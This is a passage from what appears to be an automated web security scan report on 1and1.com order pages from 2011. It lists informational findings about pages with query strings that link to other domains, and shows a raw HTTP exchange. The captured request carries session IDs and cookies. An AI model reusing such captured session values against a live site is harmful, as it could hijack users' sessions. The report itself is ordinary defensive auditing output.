...[SNIP]...
<span class="container"><img class="price-graphic alphapng alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/9/99/none/month-star.png" alt="$ 9.99"></span>
...[SNIP]...
rel="scrollbars=no,width=557,height=442" href="/xml/deref?link=https%3A%2F%2Fwww.scanalert.com%2FRatingVerify%3Fref%3Dwww.1and1.com&amp;__sign=f933cb0d2dddc861112b1d01266184f9&amp;__ts=1300632652931"><img alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" class="mcafee" src="//images.scanalert.com/meter/www.1and1.com/22.gif" width="115"></a>
...[SNIP]...

4.5. http://order.1and1.com/xml/order/Hosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 20:51:28 GMT; Path=/
ETag: 1c80cdab16ac208079c7642ff888736c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59725


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/3/99/none/month.png" alt="ab 3.99 &#8364;/Monat*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/3/99/none/month.png" alt="ab 3.99 &#8364;/Monat*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...

4.6. http://order.1and1.com/xml/order/Instant  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Instant

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain: